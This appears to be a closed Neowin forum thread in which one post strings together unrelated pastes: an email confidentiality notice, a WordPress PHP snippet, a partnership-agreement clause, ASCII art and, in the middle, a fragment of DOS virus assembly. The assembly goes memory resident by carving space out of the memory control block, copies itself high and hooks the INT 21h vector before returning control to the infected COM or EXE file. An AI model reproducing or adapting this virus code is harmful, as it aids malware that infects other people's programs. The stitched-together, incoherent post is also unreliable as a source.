Recommended Posts

Confidentiality notice : The information included in this e-mail, including any attachments, is for the sole use of the intended recipient and may contain information that is confidential. Any unauthorized review, use, disclosure, distribution or similar action is prohibited. If you are not the intended recipient, please contact the sender and delete all copies of the original message immediately.

<?php

$querystr ="

SELECT $wpdb->posts.post_title, $wpdb->posts.post_date, $wpdb->posts.post_status, $wpdb->posts.post_type FROM $wpdb->posts

WHERE $wpdb->posts.post_status = 'publish' AND $wpdb->posts.post_type = 'post'

ORDER BY $wpdb->posts.post_date DESC

LIMIT $limitp";

$pageposts = $wpdb->get_results($querystr);

if ($pageposts) {

foreach ($pageposts as $post) {

setup_postdata($post);

$title = the_title('','',0);

$titlelength = strlen($title);

if ($titlelength >= 20) {

$dots = "...<br />";

}

else {

$dots = "<br />";

}

echo substr($title,0,20);

echo $dots; ?>

<?php }

} ?>

By the way, anyone who has a better way of doing that should PM me ;)

10. VOLUNTARY TERMINATION. The partnership may be dissolved at any time by agreement of all partners, in which event the partners shall proceed with reasonable promptness to liquidate the business of the partnership. The partnership name shall be sold with the other assets of the business. The assets of the partnership business shall be used and distributed in the following order: (a) to pay or provide for the payment of all partnership liabilities and liquidating expenses and obligations; (b) to equalize the income accounts of the partners; © to discharge the balance of the income accounts of the partners; (d) to equalize the capital accounts of the partners; and (e) to discharge the balance of the capital accounts of the partners.

cseg segment

assume cs:cseg, ds:cseg, es:cseg, ss:cseg

signal equ 0FA45h

buf_size equ 250

vice_size equ 1572+buf_size

virus_size equ (offset vend-offset start)+VICE_SIZE

extrn _vice:near

org 0h

start:

call nx ; get relative offset

nx: pop bp

sub bp,offset nx

push ds es

mov ax,signal ; are we memory resident?

int 21h

or ax,ax

jz no_install ; if carry then we are

mov ax,ds ; PSP segment

dec ax ; mcb below PSP m0n

mov ds,ax ; DS=MCB seg

cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain?

jnz no_install

sub word ptr ds: [3],((Program_size+1023)/1024)*64*2 ; alloc MCB

sub word ptr ds: [12h],((Program_size+1023)/1024)*64*2 ; alloc PSP

mov es,word ptr ds: [12h] ; get high mem seg

push cs

pop ds

mov si,bp

mov cx,virus_size/2+1

xor di,di

rep movsw ; copy code to new seg

xor ax,ax

mov ds,ax ; null ds

push ds

lds ax,ds: [21h*4] ; get 21h vector

mov es: word ptr old21+2,ds ; save S:O

mov es: word ptr old21,ax

pop ds

mov ds: [21h*4+2],es ; new int 21h seg

mov ds: [21h*4],offset new21 ; new offset

sub byte ptr ds: [413h],((Program_size+1023)*2)/1024;-totalmem

no_install:

pop es ds ; restore ES DS

cmp cs:is_exe[bp],1

jz exe_return

lea si,org_bytes[bp] ; com return

mov di,0100h ; -restore first 4 bytes

mov cx,2

rep movsw

mov ax,100h ; jump back to 100h

push ax

_ret:ret

exe_return:

mov cx,ds ; calc. real CS

add cx,10h

add word ptr cs:[exe_jump+2+bp],cx

int 3 ; fix prefetch

db 0eah

exe_jump dd 0

is_exe db 0

i wonder if that can get me in trouble.... :( i hope not i was just playing the game.

Edited by littleneutrino

....................................,.-??...................` `~.,

.............................,.-?............................ .......?-.,

.........................,/.................................. .............?:,

.....................,?...................................... ................\,

.................../......................................... ..................,}

................./........................................... ...........,:`^`..}

.............../............................................. ......,:?........./

..............?.....__....................................... ..:`.........../

............./__.(.....?~-,_..............................,:` ........../

.........../(_....?~,_........?~,_....................,:`.... ...._/

..........{.._$;_......?=,_.......?-,_.......,.-~-,},.~?;/... .}

...........((.....*~_.......?=-._......?;,,./`..../?......... ...../

...,,,___.\`~,......?~.,....................`.....}.......... ..../

............(....`=-,,.......`........................(...... ;_,,-?

............/.`~,......`-...............................\.... ../\

.............\`~.*-,.....................................|,./ .....\,__

,,_..........}.>-._\...................................|.. ............`=~-,

.....`=~-,_\_......`\,.................................\..... .............

...................`=~-,,.\,...............................\. ................

................................`:,,......................... ..`\..............__

.....................................`=-,..................., %`>--==``

........................................_\..........._,-%.... ...`\.

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • Mp3tag 3.35 by Razvan Serea Mp3tag is a powerful and yet easy-to-use tool to edit metadata (ID3, Vorbis Comments and APE) of common audio formats. It can rename files based on the tag information, replace characters or words from tags and filenames, import/export tag information, create playlists and more. The program supports online freedb database lookups for selected files, allowing you to automatically gather proper tag information for select files or CDs. Mp3tag supports the following audio formats: Advanced Audio Coding (aac) Free Lossless Audio Codec (flac) Monkeys Audio (ape) Mpeg Layer 3 (mp3) MPEG-4 (mp4 / m4a / m4b / iTunes compatible) Musepack (mpc) Ogg Vorbis (ogg) OptimFROG (ofr) OptimFROG DualStream (ofs) Speex (spx) Toms Audio Kompressor (tak) True Audio (tta) Windows Media Audio (wma) WavPack (wv) Mp3tag 3.35 changelog: This version introduces a new Files options page, enhanced toolbar customization, support for RF64 WAV files, improved Discogs and MusicBrainz tag sources, and many other improvements and fixes. See the Release Notes for more details. Download: Mp3tag 64-bit | 5.7 MB (Freeware) Download: Mp3tag 32-bit | 5.2 MB Link: Mp3tag Homepage | Screenshot Get alerted to all of our Software updates on Twitter at @NeowinSoftware
    • The FIFA World Cup is not US centric.
    • It’s amusing how Microsoft is pushing IT admins as if this was a major, game-changing update. In reality, it’s just an enablement package that bumps the build number, which is disappointing compared to the more substantial 22H2 and 24H2 releases. Technically, 25H2, 26H1, and the upcoming 26H2 are essentially the same, differing only in support schedules. They could have included the Windows K2 improvements here, but chose not to. The era of Windows being in the backburner continues, and this 26H2 release feels like an afterthought. Shame, Nadella, shame.
    • Microsoft, totally not confusing /s 25H2 - Current for non-Arm based Windows 26H1 - Current for Arm based Windows 26H2 - Only for non Arm Windows
    • After I installed those, my older but capable Win 11 laptop (16GB RAM) reported it as 26H2 26300.8697. Then I installed it on my big laptop (128GB RAM! Hehe sorry), it reported it as 25H2 26220.8690. Ugh. Do I have to switch Insiders channels from Release to Beta?
  • Recent Achievements

    • Week One Done
      AMV earned a badge
      Week One Done
    • One Month Later
      AMV earned a badge
      One Month Later
    • Collaborator
      ryansurfer98 went up a rank
      Collaborator
    • One Month Later
      Eurosoft10 earned a badge
      One Month Later
    • Week One Done
      Eurosoft10 earned a badge
      Week One Done
  • Popular Contributors

    1. 1
      +primortal
      523
    2. 2
      +Edouard
      172
    3. 3
      PsYcHoKiLLa
      78
    4. 4
      Steven P.
      72
    5. 5
      Michael Scrip
      71
  • Tell a friend

    Love Neowin? Tell a friend!